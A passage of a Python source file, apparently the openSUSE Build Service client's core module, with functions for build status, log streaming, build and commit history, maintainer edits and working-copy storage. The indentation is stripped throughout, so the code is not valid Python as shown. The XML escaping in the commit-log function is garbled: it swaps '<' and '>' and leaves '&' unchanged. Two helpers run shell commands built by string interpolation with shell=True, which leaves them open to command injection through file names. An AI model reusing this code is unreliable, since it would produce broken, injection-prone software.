except:
print('osc: warn: unknown status \'%s\'...' % status[pac][tg])
print('please edit osc/core.py, and extend the buildstatus_symbols dictionary.')
st = '?'
buildstatus_symbols[status[pac][tg]] = '?'
line.append(st)
line.append(' ')
line.append(' %s %s (%s)' % tg)
line = ''.join(line)
r.append(line)
r.append('')
else:
offset = 0
for tg in targets:
r.append('| ' * offset + '%s %s (%s)'%tg )
offset += 1
for pac in pacs:
line = []
for tg in targets:
st = ''
if pac not in status or tg not in status[pac]:
# for newly added packages, status may be missing
st = '?'
else:
try:
st = buildstatus_symbols[status[pac][tg]]
except:
print('osc: warn: unknown status \'%s\'...' % status[pac][tg])
print('please edit osc/core.py, and extend the buildstatus_symbols dictionary.')
st = '?'
buildstatus_symbols[status[pac][tg]] = '?'
line.append(st)
line.append(' '+pac)
r.append(' '.join(line))
line = []
for i in range(0, len(targets)):
line.append(str(i%10))
r.append(' '.join(line))
r.append('')
if not hide_legend and len(pacs):
r.append(' Legend:')
legend = []
for i, j in buildstatus_symbols.items():
if i == "expansion error":
continue
legend.append('%3s %-20s' % (j, i))
legend.append(' ? buildstatus not available (only new packages)')
if vertical:
for i in range(0, len(targets)):
s = '%1d %s %s (%s)' % (i%10, targets[i][0], targets[i][1], targets[i][2])
if i < len(legend):
legend[i] += s
else:
legend.append(' '*24 + s)
r += legend
return r
def streamfile(url, http_meth = http_GET, bufsize=8192, data=None, progress_obj=None, text=None):
"""
performs http_meth on url and read bufsize bytes from the response
until EOF is reached. After each read bufsize bytes are yielded to the
caller. A spezial usage is bufsize="line" to read line by line (text).
"""
cl = ''
retries = 0
# Repeat requests until we get reasonable Content-Length header
# Server (or iChain) is corrupting data at some point, see bnc#656281
while cl == '':
if retries >= int(conf.config['http_retries']):
raise oscerr.OscIOError(None, 'Content-Length is empty for %s, protocol violation' % url)
retries = retries + 1
if retries > 1 and conf.config['http_debug']:
print('\n\nRetry %d --' % (retries - 1), url, file=sys.stderr)
f = http_meth.__call__(url, data = data)
cl = f.info().get('Content-Length')
if cl is not None:
# sometimes the proxy adds the same header again
# which yields in value like '3495, 3495'
# use the first of these values (should be all the same)
cl = cl.split(',')[0]
cl = int(cl)
if progress_obj:
basename = os.path.basename(urlsplit(url)[2])
progress_obj.start(basename=basename, text=text, size=cl)
if bufsize == "line":
bufsize = 8192
xread = f.readline
else:
xread = f.read
read = 0
while True:
data = xread(bufsize)
if not len(data):
break
read += len(data)
if progress_obj:
progress_obj.update(read)
yield data
if progress_obj:
progress_obj.end(read)
f.close()
if not cl is None and read != cl:
raise oscerr.OscIOError(None, 'Content-Length is not matching file size for %s: %i vs %i file size' % (url, cl, read))
def buildlog_strip_time(data):
"""Strips the leading build time from the log"""
time_regex = re.compile('^\[[^\]]*\] ', re.M)
return time_regex.sub('', data)
def print_buildlog(apiurl, prj, package, repository, arch, offset=0, strip_time=False, last=False):
"""prints out the buildlog on stdout"""
# to protect us against control characters
import string
all_bytes = string.maketrans('', '')
remove_bytes = all_bytes[:8] + all_bytes[14:32] # accept tabs and newlines
query = {'nostream' : '1', 'start' : '%s' % offset}
if last:
query['last'] = 1
while True:
query['start'] = offset
start_offset = offset
u = makeurl(apiurl, ['build', prj, repository, arch, package, '_log'], query=query)
for data in streamfile(u, bufsize="line"):
offset += len(data)
if strip_time:
data = buildlog_strip_time(data)
sys.stdout.write(data.translate(all_bytes, remove_bytes))
if start_offset == offset:
break
def get_dependson(apiurl, project, repository, arch, packages=None, reverse=None):
query = []
if packages:
for i in packages:
query.append('package=%s' % quote_plus(i))
if reverse:
query.append('view=revpkgnames')
else:
query.append('view=pkgnames')
u = makeurl(apiurl, ['build', project, repository, arch, '_builddepinfo'], query=query)
f = http_GET(u)
return f.read()
def get_buildinfo(apiurl, prj, package, repository, arch, specfile=None, addlist=None, debug=None):
query = []
if addlist:
for i in addlist:
query.append('add=%s' % quote_plus(i))
if debug:
query.append('debug=1')
u = makeurl(apiurl, ['build', prj, repository, arch, package, '_buildinfo'], query=query)
if specfile:
f = http_POST(u, data=specfile)
else:
f = http_GET(u)
return f.read()
def get_buildconfig(apiurl, prj, repository):
u = makeurl(apiurl, ['build', prj, repository, '_buildconfig'])
f = http_GET(u)
return f.read()
def get_worker_info(apiurl, worker):
u = makeurl(apiurl, ['worker', worker])
f = http_GET(u)
return f.read()
def check_constraints(apiurl, prj, repository, arch, package, constraintsfile=None):
query = {'cmd': 'checkconstraints'}
query['project'] = prj
query['package'] = package
query['repository'] = repository
query['arch'] = arch
u = makeurl(apiurl, ['worker'], query)
f = http_POST(u, data=constraintsfile)
root = ET.fromstring(''.join(f))
return [node.get('name') for node in root.findall('entry')]
def get_source_rev(apiurl, project, package, revision=None):
# API supports ?deleted=1&meta=1&rev=4
# but not rev=current,rev=latest,rev=top, or anything like this.
# CAUTION: We have to loop through all rev and find the highest one, if none given.
if revision:
url = makeurl(apiurl, ['source', project, package, '_history'], {'rev': revision})
else:
url = makeurl(apiurl, ['source', project, package, '_history'])
f = http_GET(url)
xml = ET.parse(f)
ent = None
for new in xml.findall('revision'):
# remember the newest one.
if not ent:
ent = new
elif ent.find('time').text < new.find('time').text:
ent = new
if not ent:
return { 'version': None, 'error': 'empty revisionlist: no such package?' }
e = {}
for k in ent.keys():
e[k] = ent.get(k)
for k in list(ent):
e[k.tag] = k.text
return e
def get_buildhistory(apiurl, prj, package, repository, arch, format = 'text', limit = None):
import time
query = {}
if limit != None and int(limit) > 0:
query['limit'] = int(limit)
u = makeurl(apiurl, ['build', prj, repository, arch, package, '_history'], query)
f = http_GET(u)
root = ET.parse(f).getroot()
r = []
for node in root.findall('entry'):
rev = node.get('rev')
srcmd5 = node.get('srcmd5')
versrel = node.get('versrel')
bcnt = int(node.get('bcnt'))
duration = node.get('duration')
t = time.gmtime(int(node.get('time')))
t = time.strftime('%Y-%m-%d %H:%M:%S', t)
if duration == None:
duration = ""
if format == 'csv':
r.append('%s|%s|%s|%s.%d|%s' % (t, srcmd5, rev, versrel, bcnt, duration))
else:
bversrel='%s.%d' % (versrel, bcnt)
r.append('%s %s %s %s %s' % (t, srcmd5, bversrel.ljust(16)[:16], rev, duration.rjust(10)))
if format == 'text':
r.insert(0, 'time srcmd5 vers-rel.bcnt rev duration')
return r
def print_jobhistory(apiurl, prj, current_package, repository, arch, format = 'text', limit=20):
import time
query = {}
if current_package:
query['package'] = current_package
if limit != None and int(limit) > 0:
query['limit'] = int(limit)
u = makeurl(apiurl, ['build', prj, repository, arch, '_jobhistory'], query )
f = http_GET(u)
root = ET.parse(f).getroot()
if format == 'text':
print("time package reason code build time worker")
for node in root.findall('jobhist'):
package = node.get('package')
worker = node.get('workerid')
reason = node.get('reason')
if not reason:
reason = "unknown"
code = node.get('code')
st = int(node.get('starttime'))
et = int(node.get('endtime'))
endtime = time.strftime('%Y-%m-%d %H:%M:%S', time.gmtime(et))
waittm = et-st
if waittm > 24*60*60:
waitbuild = "%1dd %2dh %2dm %2ds" % (waittm / (24*60*60), (waittm / (60*60)) % 24, (waittm / 60) % 60, waittm % 60)
elif waittm > 60*60:
waitbuild = " %2dh %2dm %2ds" % (waittm / (60*60), (waittm / 60) % 60, waittm % 60)
else:
waitbuild = " %2dm %2ds" % (waittm / 60, waittm % 60)
if format == 'csv':
print('%s|%s|%s|%s|%s|%s' % (endtime, package, reason, code, waitbuild, worker))
else:
print('%s %-50s %-16s %-16s %-16s %-16s' % (endtime, package[0:49], reason[0:15], code[0:15], waitbuild, worker))
def get_commitlog(apiurl, prj, package, revision, format = 'text', meta = False, deleted = False, revision_upper=None):
import time
query = {}
if deleted:
query['deleted'] = 1
if meta:
query['meta'] = 1
u = makeurl(apiurl, ['source', prj, package, '_history'], query)
f = http_GET(u)
root = ET.parse(f).getroot()
r = []
if format == 'xml':
r.append('<?xml version="1.0"?>')
r.append('<log>')
revisions = root.findall('revision')
revisions.reverse()
for node in revisions:
srcmd5 = node.find('srcmd5').text
try:
rev = int(node.get('rev'))
#vrev = int(node.get('vrev')) # what is the meaning of vrev?
try:
if revision is not None and revision_upper is not None:
if rev > int(revision_upper) or rev < int(revision):
continue
elif revision is not None and rev != int(revision):
continue
except ValueError:
if revision != srcmd5:
continue
except ValueError:
# this part should _never_ be reached but...
return [ 'an unexpected error occured - please file a bug' ]
version = node.find('version').text
user = node.find('user').text
try:
comment = node.find('comment').text.encode(locale.getpreferredencoding(), 'replace')
except:
comment = '<no message>'
try:
requestid = node.find('requestid').text.encode(locale.getpreferredencoding(), 'replace')
except:
requestid = ""
t = time.gmtime(int(node.find('time').text))
t = time.strftime('%Y-%m-%d %H:%M:%S', t)
if format == 'csv':
s = '%s|%s|%s|%s|%s|%s|%s' % (rev, user, t, srcmd5, version,
comment.replace('\\', '\\\\').replace('\n', '\\n').replace('|', '\\|'), requestid)
r.append(s)
elif format == 'xml':
r.append('<logentry')
r.append(' revision="%s" srcmd5="%s">' % (rev, srcmd5))
r.append('<author>%s</author>' % user)
r.append('<date>%s</date>' % t)
r.append('<requestid>%s</requestid>' % requestid)
r.append('<msg>%s</msg>' %
comment.replace('&', '&').replace('<', '>').replace('>', '<'))
r.append('</logentry>')
else:
if requestid:
requestid = "rq" + requestid
s = '-' * 76 + \
'\nr%s | %s | %s | %s | %s | %s\n' % (rev, user, t, srcmd5, version, requestid) + \
'\n' + comment
r.append(s)
if format not in ['csv', 'xml']:
r.append('-' * 76)
if format == 'xml':
r.append('</log>')
return r
def runservice(apiurl, prj, package):
u = makeurl(apiurl, ['source', prj, package], query={'cmd': 'runservice'})
try:
f = http_POST(u)
except HTTPError as e:
e.osc_msg = 'could not trigger service run for project \'%s\' package \'%s\'' % (prj, package)
raise
root = ET.parse(f).getroot()
return root.get('code')
def waitservice(apiurl, prj, package):
u = makeurl(apiurl, ['source', prj, package], query={'cmd': 'waitservice'})
try:
f = http_POST(u)
except HTTPError as e:
e.osc_msg = 'The service for project \'%s\' package \'%s\' failed' % (prj, package)
raise
root = ET.parse(f).getroot()
return root.get('code')
def mergeservice(apiurl, prj, package):
# first waiting that the service finishes and that it did not fail
waitservice(apiurl, prj, package)
# real merge
u = makeurl(apiurl, ['source', prj, package], query={'cmd': 'mergeservice'})
try:
f = http_POST(u)
except HTTPError as e:
e.osc_msg = 'could not merge service files in project \'%s\' package \'%s\'' % (prj, package)
raise
root = ET.parse(f).getroot()
return root.get('code')
def rebuild(apiurl, prj, package, repo, arch, code=None):
query = { 'cmd': 'rebuild' }
if package:
query['package'] = package
if repo:
query['repository'] = repo
if arch:
query['arch'] = arch
if code:
query['code'] = code
u = makeurl(apiurl, ['build', prj], query=query)
try:
f = http_POST(u)
except HTTPError as e:
e.osc_msg = 'could not trigger rebuild for project \'%s\' package \'%s\'' % (prj, package)
raise
root = ET.parse(f).getroot()
return root.get('code')
def store_read_project(dir):
global store
try:
p = open(os.path.join(dir, store, '_project')).readlines()[0].strip()
except IOError:
msg = 'Error: \'%s\' is not an osc project dir or working copy' % os.path.abspath(dir)
if os.path.exists(os.path.join(dir, '.svn')):
msg += '\nTry svn instead of osc.'
raise oscerr.NoWorkingCopy(msg)
return p
def store_read_package(dir):
global store
try:
p = open(os.path.join(dir, store, '_package')).readlines()[0].strip()
except IOError:
msg = 'Error: \'%s\' is not an osc package working copy' % os.path.abspath(dir)
if os.path.exists(os.path.join(dir, '.svn')):
msg += '\nTry svn instead of osc.'
raise oscerr.NoWorkingCopy(msg)
return p
def store_read_apiurl(dir, defaulturl=True):
global store
fname = os.path.join(dir, store, '_apiurl')
try:
url = open(fname).readlines()[0].strip()
# this is needed to get a proper apiurl
# (former osc versions may stored an apiurl with a trailing slash etc.)
apiurl = conf.urljoin(*conf.parse_apisrv_url(None, url))
except:
if not defaulturl:
if is_project_dir(dir):
project = store_read_project(dir)
package = None
elif is_package_dir(dir):
project = store_read_project(dir)
package = None
else:
msg = 'Error: \'%s\' is not an osc package working copy' % os.path.abspath(dir)
raise oscerr.NoWorkingCopy(msg)
msg = 'Your working copy \'%s\' is in an inconsistent state.\n' \
'Please run \'osc repairwc %s\' (Note this might _remove_\n' \
'files from the .osc/ dir). Please check the state\n' \
'of the working copy afterwards (via \'osc status %s\')' % (dir, dir, dir)
raise oscerr.WorkingCopyInconsistent(project, package, ['_apiurl'], msg)
apiurl = conf.config['apiurl']
return apiurl
def store_write_string(dir, file, string, subdir=''):
global store
if subdir and not os.path.isdir(os.path.join(dir, store, subdir)):
os.mkdir(os.path.join(dir, store, subdir))
fname = os.path.join(dir, store, subdir, file)
try:
f = open(fname + '.new', 'w')
f.write(string)
f.close()
os.rename(fname + '.new', fname)
except:
if os.path.exists(fname + '.new'):
os.unlink(fname + '.new')
raise
def store_write_project(dir, project):
store_write_string(dir, '_project', project + '\n')
def store_write_apiurl(dir, apiurl):
store_write_string(dir, '_apiurl', apiurl + '\n')
def store_unlink_file(dir, file):
global store
try: os.unlink(os.path.join(dir, store, file))
except: pass
def store_read_file(dir, file):
global store
try:
content = open(os.path.join(dir, store, file)).read()
return content
except:
return None
def store_write_initial_packages(dir, project, subelements):
global store
fname = os.path.join(dir, store, '_packages')
root = ET.Element('project', name=project)
for elem in subelements:
root.append(elem)
ET.ElementTree(root).write(fname)
def get_osc_version():
return __version__
def abortbuild(apiurl, project, package=None, arch=None, repo=None):
return cmdbuild(apiurl, 'abortbuild', project, package, arch, repo)
def restartbuild(apiurl, project, package=None, arch=None, repo=None):
return cmdbuild(apiurl, 'restartbuild', project, package, arch, repo)
def unpublish(apiurl, project, package=None, arch=None, repo=None, code=None):
return cmdbuild(apiurl, 'unpublish', project, package, arch, repo, code)
def wipebinaries(apiurl, project, package=None, arch=None, repo=None, code=None):
return cmdbuild(apiurl, 'wipe', project, package, arch, repo, code)
def cmdbuild(apiurl, cmd, project, package=None, arch=None, repo=None, code=None):
query = { 'cmd': cmd }
if package:
query['package'] = package
if arch:
query['arch'] = arch
if repo:
query['repository'] = repo
if code:
query['code'] = code
u = makeurl(apiurl, ['build', project], query)
try:
f = http_POST(u)
except HTTPError as e:
e.osc_msg = '%s command failed for project %s' % (cmd, project)
if package:
e.osc_msg += ' package %s' % package
if arch:
e.osc_msg += ' arch %s' % arch
if repo:
e.osc_msg += ' repository %s' % repo
if code:
e.osc_msg += ' code=%s' % code
raise
root = ET.parse(f).getroot()
return root.get('code')
def parseRevisionOption(string):
"""
returns a tuple which contains the revisions
"""
if string:
if ':' in string:
splitted_rev = string.split(':')
try:
for i in splitted_rev:
int(i)
return splitted_rev
except ValueError:
print('your revision \'%s\' will be ignored' % string, file=sys.stderr)
return None, None
else:
if string.isdigit():
return string, None
elif string.isalnum() and len(string) == 32:
# could be an md5sum
return string, None
else:
print('your revision \'%s\' will be ignored' % string, file=sys.stderr)
return None, None
else:
return None, None
def checkRevision(prj, pac, revision, apiurl=None, meta=False):
"""
check if revision is valid revision, i.e. it is not
larger than the upstream revision id
"""
if len(revision) == 32:
# there isn't a way to check this kind of revision for validity
return True
if not apiurl:
apiurl = conf.config['apiurl']
try:
if int(revision) > int(show_upstream_rev(apiurl, prj, pac, meta)) \
or int(revision) <= 0:
return False
else:
return True
except (ValueError, TypeError):
return False
def build_table(col_num, data = [], headline = [], width=1, csv = False):
"""
This method builds a simple table.
Example1: build_table(2, ['foo', 'bar', 'suse', 'osc'], ['col1', 'col2'], 2)
col1 col2
foo bar
suse osc
"""
longest_col = []
for i in range(col_num):
longest_col.append(0)
if headline and not csv:
data[0:0] = headline
# find longest entry in each column
i = 0
for itm in data:
if longest_col[i] < len(itm):
longest_col[i] = len(itm)
if i == col_num - 1:
i = 0
else:
i += 1
# calculate length for each column
for i, row in enumerate(longest_col):
longest_col[i] = row + width
# build rows
row = []
table = []
i = 0
for itm in data:
if i % col_num == 0:
i = 0
row = []
table.append(row)
# there is no need to justify the entries of the last column
# or when generating csv
if i == col_num -1 or csv:
row.append(itm)
else:
row.append(itm.ljust(longest_col[i]))
i += 1
if csv:
separator = '|'
else:
separator = ''
return [separator.join(row) for row in table]
def xpath_join(expr, new_expr, op='or', inner=False, nexpr_parentheses=False):
"""
Join two xpath expressions. If inner is False expr will
be surrounded with parentheses (unless it's not already
surrounded). If nexpr_parentheses is True new_expr will be
surrounded with parentheses.
"""
if not expr:
return new_expr
elif not new_expr:
return expr
# NOTE: this is NO syntax check etc. (e.g. if a literal contains a '(' or ')'
# the check might fail and expr will be surrounded with parentheses or NOT)
parentheses = not inner
if not inner and expr.startswith('(') and expr.endswith(')'):
parentheses = False
braces = [i for i in expr if i == '(' or i == ')']
closed = 0
while len(braces):
if braces.pop() == ')':
closed += 1
continue
else:
closed += -1
while len(braces):
if braces.pop() == '(':
closed += -1
else:
closed += 1
if closed != 0:
parentheses = True
break
if parentheses:
expr = '(%s)' % expr
if nexpr_parentheses:
new_expr = '(%s)' % new_expr
return '%s %s %s' % (expr, op, new_expr)
def search(apiurl, queries=None, **kwargs):
"""
Perform a search request. The requests are constructed as follows:
kwargs = {'kind1' => xpath1, 'kind2' => xpath2, ..., 'kindN' => xpathN}
GET /search/kind1?match=xpath1
...
GET /search/kindN?match=xpathN
queries is a dict of optional http query parameters, which are passed
to the makeurl call, of the form
{kindI1: dict_or_list, ..., kindIL: dict_or_list},
where kind_i1 to kind_iL are keys of kwargs.
"""
if queries is None:
queries = {}
res = {}
for urlpath, xpath in kwargs.items():
path = [ 'search' ]
path += urlpath.split('_') # FIXME: take underscores as path seperators. I see no other way atm to fix OBS api calls and not breaking osc api
query = queries.get(urlpath, {})
query['match'] = xpath
u = makeurl(apiurl, path, query)
f = http_GET(u)
res[urlpath] = ET.parse(f).getroot()
return res
def owner(apiurl, binary, mode="binary", attribute=None, project=None, usefilter=None, devel=None, limit=None):
"""
Perform a binary package owner search. This is supported since OBS 2.4.
"""
# find default project, if not specified
query = { mode: binary }
if attribute:
query['attribute'] = attribute
if project:
query['project'] = project
if devel:
query['devel'] = devel
if limit != None:
query['limit'] = limit
if usefilter != None:
query['filter'] = ",".join(usefilter)
u = makeurl(apiurl, [ 'search', 'owner' ], query)
res = None
try:
f = http_GET(u)
res = ET.parse(f).getroot()
except HTTPError as e:
# old server not supporting this search
pass
return res
def set_link_rev(apiurl, project, package, revision='', expand=False):
url = makeurl(apiurl, ['source', project, package, '_link'])
try:
f = http_GET(url)
root = ET.parse(f).getroot()
except HTTPError as e:
e.osc_msg = 'Unable to get _link file in package \'%s\' for project \'%s\'' % (package, project)
raise
revision = _set_link_rev(apiurl, project, package, root, revision, expand=expand)
l = ET.tostring(root, encoding=ET_ENCODING)
http_PUT(url, data=l)
return revision
def _set_link_rev(apiurl, project, package, root, revision='', expand=False):
"""
Updates the rev attribute of the _link xml. If revision is set to None
the rev and vrev attributes are removed from the _link xml.
updates the rev attribute of the _link xml. If revision is the empty
string the latest rev of the link's source package is used (or the
xsrcmd5 if expand is True). If revision is neither None nor the empty
string the _link's rev attribute is set to this revision (or to the
xsrcmd5 if expand is True).
"""
src_project = root.get('project', project)
src_package = root.get('package', package)
vrev = None
if revision is None:
if 'rev' in root.keys():
del root.attrib['rev']
if 'vrev' in root.keys():
del root.attrib['vrev']
elif not revision or expand:
revision, vrev = show_upstream_rev_vrev(apiurl, src_project, src_package, revision=revision, expand=expand)
if revision:
root.set('rev', revision)
# add vrev when revision is a srcmd5
if vrev is not None and revision is not None and len(revision) >= 32:
root.set('vrev', vrev)
return revision
def delete_dir(dir):
# small security checks
if os.path.islink(dir):
raise oscerr.OscIOError(None, 'cannot remove linked dir')
elif os.path.abspath(dir) == '/':
raise oscerr.OscIOError(None, 'cannot remove \'/\'')
for dirpath, dirnames, filenames in os.walk(dir, topdown=False):
for filename in filenames:
os.unlink(os.path.join(dirpath, filename))
for dirname in dirnames:
os.rmdir(os.path.join(dirpath, dirname))
os.rmdir(dir)
def delete_storedir(store_dir):
"""
This method deletes a store dir.
"""
head, tail = os.path.split(store_dir)
if tail == '.osc':
delete_dir(store_dir)
def unpack_srcrpm(srpm, dir, *files):
"""
This method unpacks the passed srpm into the
passed dir. If arguments are passed to the \'files\' tuple
only this files will be unpacked.
"""
if not is_srcrpm(srpm):
print('error - \'%s\' is not a source rpm.' % srpm, file=sys.stderr)
sys.exit(1)
curdir = os.getcwd()
if os.path.isdir(dir):
os.chdir(dir)
cmd = 'rpm2cpio %s | cpio -i %s &> /dev/null' % (srpm, ' '.join(files))
ret = run_external(cmd, shell=True)
if ret != 0:
print('error \'%s\' - cannot extract \'%s\'' % (ret, srpm), file=sys.stderr)
sys.exit(1)
os.chdir(curdir)
def is_rpm(f):
"""check if the named file is an RPM package"""
try:
h = open(f, 'rb').read(4)
except:
return False
if h == '\xed\xab\xee\xdb':
return True
else:
return False
def is_srcrpm(f):
"""check if the named file is a source RPM"""
if not is_rpm(f):
return False
try:
h = open(f, 'rb').read(8)
except:
return False
if h[7] == '\x01':
return True
else:
return False
def addMaintainer(apiurl, prj, pac, user):
# for backward compatibility only
addPerson(apiurl, prj, pac, user)
def addPerson(apiurl, prj, pac, user, role="maintainer"):
""" add a new person to a package or project """
path = quote_plus(prj),
kind = 'prj'
if pac:
path = path + (quote_plus(pac),)
kind = 'pkg'
data = meta_exists(metatype=kind,
path_args=path,
template_args=None,
create_new=False)
if data and get_user_meta(apiurl, user) != None:
root = ET.fromstring(''.join(data))
found = False
for person in root.getiterator('person'):
if person.get('userid') == user and person.get('role') == role:
found = True
print("user already exists")
break
if not found:
# the xml has a fixed structure
root.insert(2, ET.Element('person', role=role, userid=user))
print('user \'%s\' added to \'%s\'' % (user, pac or prj))
edit_meta(metatype=kind,
path_args=path,
data=ET.tostring(root, encoding=ET_ENCODING))
else:
print("osc: an error occured")
def delMaintainer(apiurl, prj, pac, user):
# for backward compatibility only
delPerson(apiurl, prj, pac, user)
def delPerson(apiurl, prj, pac, user, role="maintainer"):
""" delete a person from a package or project """
path = quote_plus(prj),
kind = 'prj'
if pac:
path = path + (quote_plus(pac), )
kind = 'pkg'
data = meta_exists(metatype=kind,
path_args=path,
template_args=None,
create_new=False)
if data and get_user_meta(apiurl, user) != None:
root = ET.fromstring(''.join(data))
found = False
for person in root.getiterator('person'):
if person.get('userid') == user and person.get('role') == role:
root.remove(person)
found = True
print("user \'%s\' removed" % user)
if found:
edit_meta(metatype=kind,
path_args=path,
data=ET.tostring(root, encoding=ET_ENCODING))
else:
print("user \'%s\' not found in \'%s\'" % (user, pac or prj))
else:
print("an error occured")
def setBugowner(apiurl, prj, pac, user=None, group=None):
""" delete all bugowners (user and group entries) and set one new one in a package or project """
path = quote_plus(prj),
kind = 'prj'
if pac:
path = path + (quote_plus(pac), )
kind = 'pkg'
data = meta_exists(metatype=kind,
path_args=path,
template_args=None,
create_new=False)
if user.startswith('group:'):
group=user.replace('group:', '')
user=None
if data:
root = ET.fromstring(''.join(data))
for group_element in root.getiterator('group'):
if group_element.get('role') == "bugowner":
root.remove(group_element)
for person_element in root.getiterator('person'):
if person_element.get('role') == "bugowner":
root.remove(person_element)
if user:
root.insert(2, ET.Element('person', role='bugowner', userid=user))
elif group:
root.insert(2, ET.Element('group', role='bugowner', groupid=group))
else:
print("Neither user nor group is specified")
edit_meta(metatype=kind,
path_args=path,
data=ET.tostring(root, encoding=ET_ENCODING))
def setDevelProject(apiurl, prj, pac, dprj, dpkg=None):
""" set the <devel project="..."> element to package metadata"""
path = (quote_plus(prj),) + (quote_plus(pac),)
data = meta_exists(metatype='pkg',
path_args=path,
template_args=None,
create_new=False)
if data and show_project_meta(apiurl, dprj) != None:
root = ET.fromstring(''.join(data))
if not root.find('devel') != None:
ET.SubElement(root, 'devel')
elem = root.find('devel')
if dprj:
elem.set('project', dprj)
else:
if 'project' in elem.keys():
del elem.attrib['project']
if dpkg:
elem.set('package', dpkg)
else:
if 'package' in elem.keys():
del elem.attrib['package']
edit_meta(metatype='pkg',
path_args=path,
data=ET.tostring(root, encoding=ET_ENCODING))
else:
print("osc: an error occured")
def createPackageDir(pathname, prj_obj=None):
"""
create and initialize a new package dir in the given project.
prj_obj can be a Project() instance.
"""
prj_dir, pac_dir = getPrjPacPaths(pathname)
if is_project_dir(prj_dir):
global store
if not os.path.exists(os.path.join(pathname, store)):
prj = prj_obj or Project(prj_dir, False)
Package.init_package(prj.apiurl, prj.name, pac_dir, pathname)
prj.addPackage(pac_dir)
print(statfrmt('A', os.path.normpath(pathname)))
else:
raise oscerr.OscIOError(None, 'file or directory \'%s\' already exists' % pathname)
else:
msg = '\'%s\' is not a working copy' % prj_dir
if os.path.exists(os.path.join(prj_dir, '.svn')):
msg += '\ntry svn instead of osc.'
raise oscerr.NoWorkingCopy(msg)
def stripETxml(node):
node.tail = None
if node.text != None:
node.text = node.text.replace(" ", "").replace("\n", "")
for child in node.getchildren():
stripETxml(child)
def addGitSource(url):
service_file = os.path.join(os.getcwd(), '_service')
addfile = False
if os.path.exists( service_file ):
services = ET.parse(os.path.join(os.getcwd(), '_service')).getroot()
else:
services = ET.fromstring("<services />")
addfile = True
stripETxml( services )
si = Serviceinfo()
s = si.addGitUrl(services, url)
s = si.addTarUp(services)
s = si.addRecompressTar(services)
s = si.addSetVersion(services)
si.read(s)
# for pretty output
xmlindent(s)
f = open(service_file, 'wb')
f.write(ET.tostring(s, encoding=ET_ENCODING))
f.close()
if addfile:
addFiles( ['_service'] )
def addDownloadUrlService(url):
service_file = os.path.join(os.getcwd(), '_service')
addfile = False
if os.path.exists( service_file ):
services = ET.parse(os.path.join(os.getcwd(), '_service')).getroot()
else:
services = ET.fromstring("<services />")
addfile = True
stripETxml( services )
si = Serviceinfo()
s = si.addDownloadUrl(services, url)
si.read(s)
# for pretty output
xmlindent(s)
f = open(service_file, 'wb')
f.write(ET.tostring(s, encoding=ET_ENCODING))
f.close()
if addfile:
addFiles( ['_service'] )
# download file
path = os.getcwd()
files = os.listdir(path)
si.execute(path)
newfiles = os.listdir(path)
# add verify service for new files
for filename in files:
newfiles.remove(filename)
for filename in newfiles:
if filename.startswith('_service:download_url:'):
s = si.addVerifyFile(services, filename)
# for pretty output
xmlindent(s)
f = open(service_file, 'wb')
f.write(ET.tostring(s, encoding=ET_ENCODING))
f.close()
def addFiles(filenames, prj_obj = None):
for filename in filenames:
if not os.path.exists(filename):
raise oscerr.OscIOError(None, 'file \'%s\' does not exist' % filename)
# init a package dir if we have a normal dir in the "filenames"-list
# so that it will be find by findpacs() later
pacs = list(filenames)
for filename in filenames:
prj_dir, pac_dir = getPrjPacPaths(filename)
if not is_package_dir(filename) and os.path.isdir(filename) and is_project_dir(prj_dir) \
and conf.config['do_package_tracking']:
prj_name = store_read_project(prj_dir)
prj_apiurl = store_read_apiurl(prj_dir, defaulturl=False)
Package.init_package(prj_apiurl, prj_name, pac_dir, filename)
elif is_package_dir(filename) and conf.config['do_package_tracking']:
print('osc: warning: \'%s\' is already under version control' % filename)
pacs.remove(filename)
elif os.path.isdir(filename) and is_project_dir(prj_dir):
raise oscerr.WrongArgs('osc: cannot add a directory to a project unless ' \
'\'do_package_tracking\' is enabled in the configuration file')
pacs, no_pacs = findpacs(pacs, fatal=False)
for filename in no_pacs:
filename = os.path.normpath(filename)
directory = os.path.join(filename, os.pardir)
if not is_package_dir(directory):
print('osc: warning: \'%s\' cannot be associated to a package' % filename)
continue
resp = raw_input("%s is a directory, do you want to archive it for submission? (y/n) " % (filename))
if resp not in ('y', 'Y'):
continue
archive = "%s.obscpio" % filename
# XXX: hmm we should use subprocess.Popen here (to avoid all the
# issues that come with shell=True...)
run_external("find %s | cpio -o -H newc > %s" % (filename, archive), shell=True)
pacs.extend(findpacs([archive]))
for pac in pacs:
if conf.config['do_package_tracking'] and not pac.todo:
prj = prj_obj or Project(os.path.dirname(pac.absdir), False)
if pac.name in prj.pacs_unvers:
prj.addPackage(pac.name)
print(statfrmt('A', getTransActPath(os.path.join(pac.dir, os.pardir, pac.name))))
for filename in pac.filenamelist_unvers:
if os.path.isdir(os.path.join(pac.dir, filename)):
print('skipping directory \'%s\'' % os.path.join(pac.dir, filename))
else:
pac.todo.append(filename)
elif pac.name in prj.pacs_have:
print('osc: warning: \'%s\' is already under version control' % pac.name)
for filename in pac.todo:
if filename in pac.skipped:
continue
if filename in pac.excluded:
print('osc: warning: \'%s\' is excluded from a working copy' % filename, file=sys.stderr)
continue
try:
pac.addfile(filename)
except oscerr.PackageFileConflict as e:
fname = os.path.join(getTransActPath(pac.dir), filename)
print('osc: warning: \'%s\' is already under version control' % fname)
def getPrjPacPaths(path):
"""
returns the path for a project and a package
from path. This is needed if you try to add
or delete packages:
Examples:
osc add pac1/: prj_dir = CWD;
pac_dir = pac1
osc add /path/to/pac1:
prj_dir = path/to;
pac_dir = pac1
osc add /path/to/pac1/file
=> this would be an invalid path
the caller has to validate the returned
path!
"""
# make sure we hddave a dir: osc add bar vs. osc add bar/; osc add /path/to/prj_dir/new_pack
# filename = os.path.join(tail, '')
prj_dir, pac_dir = os.path.split(os.path.normpath(path))
if prj_dir == '':
prj_dir = os.getcwd()
return (prj_dir, pac_dir)
def getTransActPath(pac_dir):
"""
returns the path for the commit and update operations/transactions.
Normally the "dir" attribute of a Package() object will be passed to
this method.
"""
if pac_dir != '.':
pathn = os.path.normpath(pac_dir)
else:
pathn = ''
return pathn
def get_commit_message_template(pac):
"""
Read the difference in .changes file(s) and put them as a template to commit message.
"""
diff = []
template = []
if pac.todo:
todo = pac.todo
else:
todo = pac.filenamelist + pac.filenamelist_unvers
files = [i for i in todo if i.endswith('.changes') and pac.status(i) in ('A', 'M')]
for filename in files:
if pac.status(filename) == 'M':
diff += get_source_file_diff(pac.absdir, filename, pac.rev)
elif pac.status(filename) == 'A':
f = open(os.path.join(pac.absdir, filename), 'r')
for line in f:
diff += '+' + line
f.close()
if diff:
template = parse_diff_for_commit_message(''.join(diff))
